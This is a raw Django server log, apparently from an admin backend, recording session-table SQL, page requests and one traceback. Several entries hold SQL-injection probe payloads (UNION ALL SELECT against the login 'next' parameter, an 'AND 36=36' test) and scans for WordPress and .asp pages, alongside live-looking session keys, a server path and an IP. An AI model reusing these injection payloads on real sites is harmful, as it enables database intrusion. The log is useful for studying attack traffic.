('2gcmif627yn5dgshh1nf0w0xlke2gr5x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:43.032168+00:00'::timestamptz); args=('2gcmif627yn5dgshh1nf0w0xlke2gr5x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 43, 32168, tzinfo=)) [01/Jan/2020 15:25:43] "GET /login/?next=-3377%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27humQiYbsVv%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20baBT HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:43,197 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '27s41uh8rahe5g9hmrgg7tz4ej466q00' LIMIT 1; args=('27s41uh8rahe5g9hmrgg7tz4ej466q00',) DEBUG 2020-01-01 15:25:43,201 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('27s41uh8rahe5g9hmrgg7tz4ej466q00', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:43.198786+00:00'::timestamptz); args=('27s41uh8rahe5g9hmrgg7tz4ej466q00', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 43, 198786, tzinfo=)) [01/Jan/2020 15:25:43] "GET /login/?next=-5026%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27pcyFKriXnF%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20RRAD HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:43,375 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'u990faj3yg9l4hw0w0fidvwxrdgyuhqa' LIMIT 1; args=('u990faj3yg9l4hw0w0fidvwxrdgyuhqa',) DEBUG 2020-01-01 15:25:43,378 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('u990faj3yg9l4hw0w0fidvwxrdgyuhqa', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:43.376288+00:00'::timestamptz); args=('u990faj3yg9l4hw0w0fidvwxrdgyuhqa', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 43, 376288, tzinfo=)) [01/Jan/2020 15:25:43] "GET /login/?next=-5979%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27fmysdggXzf%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20vdgT HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:43,542 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0nbzgk9p3msxe0n39iyeck5v6bixapo3' LIMIT 1; args=('0nbzgk9p3msxe0n39iyeck5v6bixapo3',) DEBUG 2020-01-01 15:25:43,544 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0nbzgk9p3msxe0n39iyeck5v6bixapo3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:43.542865+00:00'::timestamptz); args=('0nbzgk9p3msxe0n39iyeck5v6bixapo3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 43, 542865, tzinfo=)) [01/Jan/2020 15:25:43] "GET /login/?next=-2581%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27oanIjSpYse%27%7C%7C%27qppzq%27%20FROM%20MSysAccessObjects--%20kXEB HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:43,708 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'byhasrr5i18yho7z3hdpmf8f0eixgc72' LIMIT 1; args=('byhasrr5i18yho7z3hdpmf8f0eixgc72',) DEBUG 2020-01-01 15:25:43,710 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('byhasrr5i18yho7z3hdpmf8f0eixgc72', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:43.709024+00:00'::timestamptz); args=('byhasrr5i18yho7z3hdpmf8f0eixgc72', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 43, 709024, tzinfo=)) [01/Jan/2020 15:25:43] "GET /login/?next=-7763%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27mdTXiouiLJ%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20EUrN HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:43,867 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ika7l96pdn1let9zwqsp4mbtcxgd0thx' LIMIT 1; args=('ika7l96pdn1let9zwqsp4mbtcxgd0thx',) DEBUG 2020-01-01 15:25:43,869 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ika7l96pdn1let9zwqsp4mbtcxgd0thx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:43.867705+00:00'::timestamptz); args=('ika7l96pdn1let9zwqsp4mbtcxgd0thx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 43, 867705, tzinfo=)) [01/Jan/2020 15:25:43] "GET /login/?next=-1386%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27xoGyztnqNg%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20XgdY HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:44,094 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'isx38enhn1qd9vbh16apqjckye6qnlx6' LIMIT 1; args=('isx38enhn1qd9vbh16apqjckye6qnlx6',) DEBUG 2020-01-01 15:25:44,096 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('isx38enhn1qd9vbh16apqjckye6qnlx6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:44.094845+00:00'::timestamptz); args=('isx38enhn1qd9vbh16apqjckye6qnlx6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 44, 94845, tzinfo=)) [01/Jan/2020 15:25:44] "GET /login/?next=-1995%20UNION%20ALL%20SELECT%2062%2C62%2C%27qxvkq%27%7C%7C%27idWSEnpLBO%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20CxyQ HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:44,259 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bjutncyh9g0wqovpfhotrizfchmiunv7' LIMIT 1; args=('bjutncyh9g0wqovpfhotrizfchmiunv7',) DEBUG 2020-01-01 15:25:44,261 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bjutncyh9g0wqovpfhotrizfchmiunv7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:44.259934+00:00'::timestamptz); args=('bjutncyh9g0wqovpfhotrizfchmiunv7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 44, 259934, tzinfo=)) [01/Jan/2020 15:25:44] "GET /login/?next=-8630%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27LughntOBrF%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20QFnA HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:44,428 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yy1nl74cwv067lse8o4x6t3qcc3xdjyq' LIMIT 1; args=('yy1nl74cwv067lse8o4x6t3qcc3xdjyq',) DEBUG 2020-01-01 15:25:44,430 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yy1nl74cwv067lse8o4x6t3qcc3xdjyq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:44.428942+00:00'::timestamptz); args=('yy1nl74cwv067lse8o4x6t3qcc3xdjyq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 44, 428942, tzinfo=)) [01/Jan/2020 15:25:44] "GET /login/?next=-3273%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27KoSnNNAmlS%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20jgcL HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:44,577 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'czychjufnfyufry8dsqclegy9idtodmp' LIMIT 1; args=('czychjufnfyufry8dsqclegy9idtodmp',) DEBUG 2020-01-01 15:25:44,579 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('czychjufnfyufry8dsqclegy9idtodmp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:44.577717+00:00'::timestamptz); args=('czychjufnfyufry8dsqclegy9idtodmp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 44, 577717, tzinfo=)) [01/Jan/2020 15:25:44] "GET /login/?next=-8320%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27YvTSXEeCHA%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20BDuc HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:44,724 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5wkadgu4fpn0ze5608pjktkrdki25v43' LIMIT 1; args=('5wkadgu4fpn0ze5608pjktkrdki25v43',) DEBUG 2020-01-01 15:25:44,725 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5wkadgu4fpn0ze5608pjktkrdki25v43', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:44.724650+00:00'::timestamptz); args=('5wkadgu4fpn0ze5608pjktkrdki25v43', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 44, 724650, tzinfo=)) [01/Jan/2020 15:25:44] "GET /login/?next=-9362%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27YrOsBWHPqz%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20bkcb HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:44,896 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ih61yh9dqldblxxyanmdy01a7lmc7gz4' LIMIT 1; args=('ih61yh9dqldblxxyanmdy01a7lmc7gz4',) DEBUG 2020-01-01 15:25:44,899 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ih61yh9dqldblxxyanmdy01a7lmc7gz4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:44.897508+00:00'::timestamptz); args=('ih61yh9dqldblxxyanmdy01a7lmc7gz4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 44, 897508, tzinfo=)) [01/Jan/2020 15:25:44] "GET /login/?next=-9666%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27IExZLWKnwR%27%7C%7C%27qppzq%27%2C62%20FROM%20MSysAccessObjects--%20oYwx HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:45,052 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7dhpvtu4dahcultochpsx4vlupklf6a3' LIMIT 1; args=('7dhpvtu4dahcultochpsx4vlupklf6a3',) DEBUG 2020-01-01 15:25:45,055 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7dhpvtu4dahcultochpsx4vlupklf6a3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:45.053438+00:00'::timestamptz); args=('7dhpvtu4dahcultochpsx4vlupklf6a3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 45, 53438, tzinfo=)) [01/Jan/2020 15:25:45] "GET /login/?next=-1488%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27gTaHHdcrkb%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20iRbP HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:45,346 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dxg525u3mczqeap8lqq393h3jdichmlh' LIMIT 1; args=('dxg525u3mczqeap8lqq393h3jdichmlh',) DEBUG 2020-01-01 15:25:45,347 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dxg525u3mczqeap8lqq393h3jdichmlh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:45.346452+00:00'::timestamptz); args=('dxg525u3mczqeap8lqq393h3jdichmlh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 45, 346452, tzinfo=)) [01/Jan/2020 15:25:45] "GET /login/?next=%2F%20AND%2036%3D36 HTTP/1.0" 200 1814 [01/Jan/2020 15:33:47] "GET / HTTP/1.0" 302 0 Not Found: /clientaccesspolicy.xml [01/Jan/2020 15:35:35] "GET /clientaccesspolicy.xml HTTP/1.0" 404 6376 [01/Jan/2020 15:38:50] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:43:53] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:48:56] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 15:50:45] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:53:59] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:59:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:17:04] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 16:17:06,356 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'i1ov904bhoqxq91vcg0jysdr2wo379mu' LIMIT 1; args=('i1ov904bhoqxq91vcg0jysdr2wo379mu',) DEBUG 2020-01-01 16:17:06,359 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('i1ov904bhoqxq91vcg0jysdr2wo379mu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T16:17:06.357436+00:00'::timestamptz); args=('i1ov904bhoqxq91vcg0jysdr2wo379mu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 16, 17, 6, 357436, tzinfo=)) [01/Jan/2020 16:17:06] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [01/Jan/2020 16:18:00] "GET /robots.txt HTTP/1.0" 404 6341 [01/Jan/2020 16:20:11] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:25:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:30:16] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/Comment.asp [01/Jan/2020 16:31:58] "GET /bmxx/Comment.asp?ArticleID=18 HTTP/1.0" 404 6372 Not Found: /bmxx/Comment.asp [01/Jan/2020 16:32:53] "GET /bmxx/Comment.asp?ArticleID=352 HTTP/1.0" 404 6373 [01/Jan/2020 16:35:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:40:22] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:45:25] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:50:27] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:53:56] "GET / HTTP/1.0" 302 0 [01/Jan/2020 16:55:31] "GET / HTTP/1.0" 302 0 [01/Jan/2020 17:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 17:10:05] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Jan/2020 17:11:19] "GET /wp-login.php HTTP/1.0" 404 6351 Not Found: /jspd/SendMail.asp [01/Jan/2020 17:12:19] "GET /jspd/SendMail.asp?ArticleID=271 HTTP/1.0" 404 6376 [01/Jan/2020 17:15:08] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [01/Jan/2020 17:17:42] "GET /newslist.asp?type=4&id=1720 HTTP/1.0" 404 6366 [01/Jan/2020 17:18:14] "GET / HTTP/1.0" 302 0 Not Found: /dtgh/ShowArticle.asp [01/Jan/2020 17:19:59] "GET /dtgh/ShowArticle.asp?ArticleID=514 HTTP/1.0" 404 6385 [01/Jan/2020 17:20:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 17:28:44] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 17:28:44,776 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '29birvkqx4q1al4nnxlx0q5vqwefb8fu' LIMIT 1; args=('29birvkqx4q1al4nnxlx0q5vqwefb8fu',) DEBUG 2020-01-01 17:28:44,778 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('29birvkqx4q1al4nnxlx0q5vqwefb8fu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T17:28:44.777481+00:00'::timestamptz); args=('29birvkqx4q1al4nnxlx0q5vqwefb8fu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 17, 28, 44, 777481, tzinfo=)) [01/Jan/2020 17:28:44] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 17:28:45] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [01/Jan/2020 17:28:45] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [01/Jan/2020 17:28:45] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [01/Jan/2020 17:28:45] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [01/Jan/2020 17:28:46] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [01/Jan/2020 17:28:46] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /favicon.ico [01/Jan/2020 17:28:48] "GET /favicon.ico HTTP/1.0" 404 6344 Not Found: /wp-login.php [01/Jan/2020 17:28:52] "GET /wp-login.php HTTP/1.0" 404 6353 [01/Jan/2020 17:30:00] "GET / HTTP/1.0" 302 0 [01/Jan/2020 17:35:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 17:41:06] "GET / HTTP/1.0" 302 0 [01/Jan/2020 17:46:09] "GET / HTTP/1.0" 302 0 [01/Jan/2020 17:51:12] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [01/Jan/2020 17:53:12] "GET /index.asp?T=my HTTP/1.0" 404 6343 [01/Jan/2020 17:56:15] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [01/Jan/2020 18:00:30] "GET /newslist.asp?type=1&id=40200 HTTP/1.0" 404 6367 Not Found: /newslist.asp [01/Jan/2020 18:00:33] "GET /newslist.asp?type=4&id=1307 HTTP/1.0" 404 6366 Not Found: /User/User_Favorite.asp [01/Jan/2020 18:01:41] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=484 HTTP/1.0" 404 6422 [01/Jan/2020 18:05:00] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 18:10:21] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:15:24] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:20:27] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Jan/2020 18:21:26] "GET /wp-login.php HTTP/1.0" 404 6352 [01/Jan/2020 18:22:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:25:29] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Jan/2020 18:29:27] "GET /wp-login.php HTTP/1.0" 404 6364 Not Found: /xsyd/ShowArticle.asp [01/Jan/2020 18:29:52] "GET /xsyd/ShowArticle.asp?ArticleID=513 HTTP/1.0" 404 6385 [01/Jan/2020 18:30:32] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:31:17] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:35:36] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/SendMail.asp [01/Jan/2020 18:38:15] "GET /xyzx/SendMail.asp?ArticleID=256 HTTP/1.0" 404 6376 [01/Jan/2020 18:39:04] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:40:39] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [01/Jan/2020 18:43:33] "GET /newslist.asp?type=1&id=99002 HTTP/1.0" 404 6367 [01/Jan/2020 18:45:41] "GET / HTTP/1.0" 302 0 [01/Jan/2020 18:50:43] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [01/Jan/2020 18:53:14] "POST /editBlackAndWhiteList HTTP/1.0" 500 64006 [01/Jan/2020 18:56:26] "GET / HTTP/1.0" 302 0 [01/Jan/2020 19:04:39] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Jan/2020 19:09:18] "GET /wp-login.php HTTP/1.0" 404 6347 [01/Jan/2020 19:11:16] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowArticle.asp [01/Jan/2020 19:12:18] "GET /xsyd/ShowArticle.asp?ArticleID=464 HTTP/1.0" 404 6385 Not Found: /dtgh/UploadFiles_5967/201702/2017022209512900.jpg [01/Jan/2020 19:13:05] "GET /dtgh/UploadFiles_5967/201702/2017022209512900.jpg HTTP/1.0" 404 6458 Not Found: /aqgl/ShowClass.asp [01/Jan/2020 19:13:16] "GET /aqgl/ShowClass.asp?ClassID=8 HTTP/1.0" 404 6375 Not Found: /bmxx/Index.asp [01/Jan/2020 19:19:17] "GET /bmxx/Index.asp HTTP/1.0" 404 6353 Not Found: /robots.txt [01/Jan/2020 19:19:53] "GET /robots.txt HTTP/1.0" 404 6340 [01/Jan/2020 19:19:53] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 19:19:54,929 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jp1hoamloni94e652tfdibgxmhz9ubyi' LIMIT 1; args=('jp1hoamloni94e652tfdibgxmhz9ubyi',) DEBUG 2020-01-01 19:19:54,930 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jp1hoamloni94e652tfdibgxmhz9ubyi', 